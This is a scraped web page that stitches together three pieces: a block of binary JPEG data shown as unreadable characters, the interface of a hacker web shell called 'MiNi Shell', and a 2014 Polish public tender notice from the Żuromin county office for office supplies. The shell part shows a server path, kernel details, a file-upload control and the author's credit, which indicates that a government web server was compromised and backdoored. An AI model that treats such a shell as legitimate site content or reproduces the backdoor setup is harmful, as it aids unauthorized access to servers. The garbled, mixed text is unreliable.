JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141223/263857-N-2014.html

<p class="kh_header"><b>Żuromin: Dostawa materiałów biurowych dla potrzeb Starostwa Powiatowego w Żurominie oraz jednostek organizacyjnych powiatu - część 4</b><br>
<b>Numer ogłoszenia: 263857 - 2014; data zamieszczenia: 23.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe Żuromin , Plac Piłsudskiego 4, 09-300 Żuromin, woj. mazowieckie, tel. 023 6574700, faks 023 6573535.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych dla potrzeb Starostwa Powiatowego w Żurominie oraz jednostek organizacyjnych powiatu - część 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Dostawa materiałów biurowych dla potrzeb Starostwa Powiatowego w Żurominie oraz jednostek organizacyjnych powiatu tj.
Część 4 Dom Pomocy Społecznej w Bądzynie, 09-304 Lubowidz. Szczegółowy opis przedmiotu zamówienia znajduje się w odpowiednim załączniku  do specyfikacji istotnych warunków zamówienia. Dostawy będą realizowane partiami odpowiednio do siedziby zamawiającego (poszczególnych jednostek organizacyjnych), w okresie obowiązywania umowy, według potrzeb określanych w zapotrzebowaniu przez zamawiającego (odpowiednią jednostkę organizacyjną), w formie pisemnej, za pomocą faksu, drogą elektroniczną, a w nagłych przypadkach również telefonicznie. 
Podane ilości asortymentu są wielkością szacunkową, dlatego  Zamawiający zastrzega sobie prawo zakupu mniejszej bądź większej ilości towaru po zaoferowanej cenie w granicach łącznej ceny oferty całego zamówienia w danej części zamówienia. W związku z tym ilość  towaru może ulec zmianie. Nie zrealizowanie całkowitej ilości towaru w okresie trwania umowy nie powoduje obowiązku Zamawiającego do odbioru niezrealizowanej części dostaw, ani jakichkolwiek roszczeń odszkodowawczych z tego powodu. Zamawiający nie ponosi odpowiedzialności prawnej ani finansowej za niezrealizowanie części zamówienia. Wszystkie zaoferowane materiały muszą być pierwszego gatunku, fabrycznie nowe i wolne od wad. Oferowane materiały muszą ściśle odpowiadać cechom oraz parametrom określonym przez zamawiającego, jak również posiadać określone właściwości użytkowe i przyjęte standardy jakości. Wszystkie materiały muszą posiadać oryginalne opakowania producenta, opatrzone w etykiety identyfikujące dany produkt. Materiały z każdej dostawy o ograniczonym terminie trwałości muszą mieć, co najmniej 6 miesięczny okres przydatności do użytku, licząc od daty dostawy.Zamawiający w ramach dostawy materiałów eksploatacyjnych wymaga dostawy oryginalnych i nowych, nieużywanych, nieuszkodzonych i oryginalnie zapakowanych tuszów, tonerów, taśm barwiących, głowic itp. do opisanego w szczegółowym opisie przedmiotu zamówienia sprzętu biurowego, czyli drukarek, kserokopiarek, urządzeń wielofunkcyjnych, ploterów i faksów itd. Poprzez określenie (oryginalne i nowe) należy rozumieć materiały eksploatacyjne fabrycznie nowe, nieregenerowane, niefabrykowane, wyprodukowane przez producenta drukarki, kserokopiarki lub innego urządzenia biurowego. Wymaga się, aby oferowane materiały eksploatacyjne posiadały gwarancję na minimum 12 miesięcy licząc od dnia dostawy. Nie dopuszcza się materiałów eksploatacyjnych regenerowanych lub powtórnie napełnianych.Zamawiający dopuszcza możliwość przedstawienia w ofercie asortymentu równoważnego.Za materiały eksploatacyjne równoważne (tzw. zamienniki) uznaje się materiały fabrycznie nowe posiadające wszystkie parametry techniczne, funkcjonalne, użytkowe i jakościowe co najmniej takie, jak materiały oryginalne wymagane przez producenta sprzętu i dopuszczone przez producenta urządzenia do stosowania w nim, a nie powodujące utraty gwarancji, potwierdzone raportami z testów wykonanych wg norm ISO/IEC 19798, ISO/IEC 19752, ISO/IEC 24711, ISO/IEC 24712. Przez równoważność należy rozumieć funkcjonalność, jakość wydruku (kopii), wydajność przy 5% pokryciu strony A4, szybkość schnięcia (utrwalania, nie zamazywanie się druku) odpowiadające wyrobom producenta, czyli nie gorszą niż  oryginalne. Wszystkie dostarczane tonery i tusze, taśmy barwiące muszą być oznaczone numerem katalogowym lub innym oznaczeniem stosowanym przez producenta, posiadać oryginalne fabryczne opakowanie oraz zabezpieczenie stosowane przez producentów ( np. hologramy). Sposób opakowania musi umożliwiać identyfikację produktu (ilość, rodzaj, parametry techniczne) bez konieczności naruszania opakowania, a także identyfikację producenta, numer katalogowy lub inne oznaczenie stosowane przez producenta, termin przydatności do użycia. Szczegółowy opis przedmiotu zamówienia określony został w załączniku nr 1 do formularza oferty. Załącznik te stanowi przybliżone zapotrzebowanie na poszczególne materiały biurowe, które zamawiający zamierza realizować  w okresie trwania umowy. Zamawiający wymaga, aby oferta obejmowała całość przedmiotu zamówienia, wobec czego wykonawca jest zobowiązany do wypełnienia wszystkich rubryk w formularzu cenowym. Nie wypełnienie wszystkich rubryk w formularzu cenowym, stanowiącym integralną część oferty spowoduje jej odrzucenie, jako niezgodnej z zapisami niniejszej siwz. Zamawiający nie przewiduje udzielenia zamówień uzupełniających. Zamawiający nie dopuszcza składania ofert wariantowych. Wykonawca może złożyć ofertę na jedną część (w tym przypadku tylko część 4). Oferty nie zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.00.00-7, 30.19.93.30-1, 30.19.76.30-1, 22.81.60.00-3, 22.90.00.00-3, 30.12.51.10-5, 30.19.23.00-4, 30.19.21.13-6, 22.00.00.00-0, 30.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń i dokumentów na zasadzie spełnia - nie spełnia. O udzielenie zamówienia mogą ubiegać się wszyscy Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy Pzp, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń na zasadzie spełnia - nie spełnia.Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Formularz 3.2)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń na zasadzie spełnia - nie spełnia.Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Formularz 3.2)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń na zasadzie spełnia - nie spełnia.Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Formularz 3.2)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń na zasadzie spełnia - nie spełnia.Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (Formularz 3.2)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku oferowania materiałów eksploatacyjnych nieoryginalnych (z wyłączeniem poz., gdzie zamawiający wskazuje zamiennik), w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom zamawiającego, zamawiający wymaga załączenia do oferty: 1) dokumentów potwierdzających spełnianie następujących norm: - w przypadku drukarek laserowych: ISO/IEC 19798 - tonery kolorowe; ISO/IEC 19752 - tonery monochromatyczne; - w przypadku drukarek atramentowych: ISO/IEC 24711 - tusze monochromatyczne; - ISO/IEC 24712 - tusze kolorowe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę umowy w przedmiocie zamówienia i zaoferowaniu innych produktów niż wycenione przez wykonawcę w formularzu cenowym, w przypadku gdy materiały wyszczególnione w tym formularzu, zostaną wycofane z produkcji lub zastąpione innymi produktami spełniającymi te same funkcje. Przedstawione produkty w miejsce poprzednich muszą posiadać parametry nie gorsze niż opisane w przedmiotowym formularzu i spełniać wszystkie wymagania w nim zawarte. Dopuszczalna jest również zmiana cen jednostkowych w zakresie zaoferowania innych produktów, jednak ceny te nie mogą być wyższe niż przedłożone w ofercie. Zmiana zostanie dokonana na wniosek Dostawcy po akceptacji Zamawiającego. W przypadku jej braku Dostawca winien dostarczać przedmiot zamówienia zgodny z przedstawioną ofertą przetargową. Zamawiający dopuszcza również zmiany umowy wynikające ze zmiany przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zuromin-powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żurominie Pl. Józefa Piłsudskiego 4, 09-300 Żuromin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.12.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Żurominie Pl. Józefa Piłsudskiego 4 09-300 Żuromin, sekretariat-pokój nr 32..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com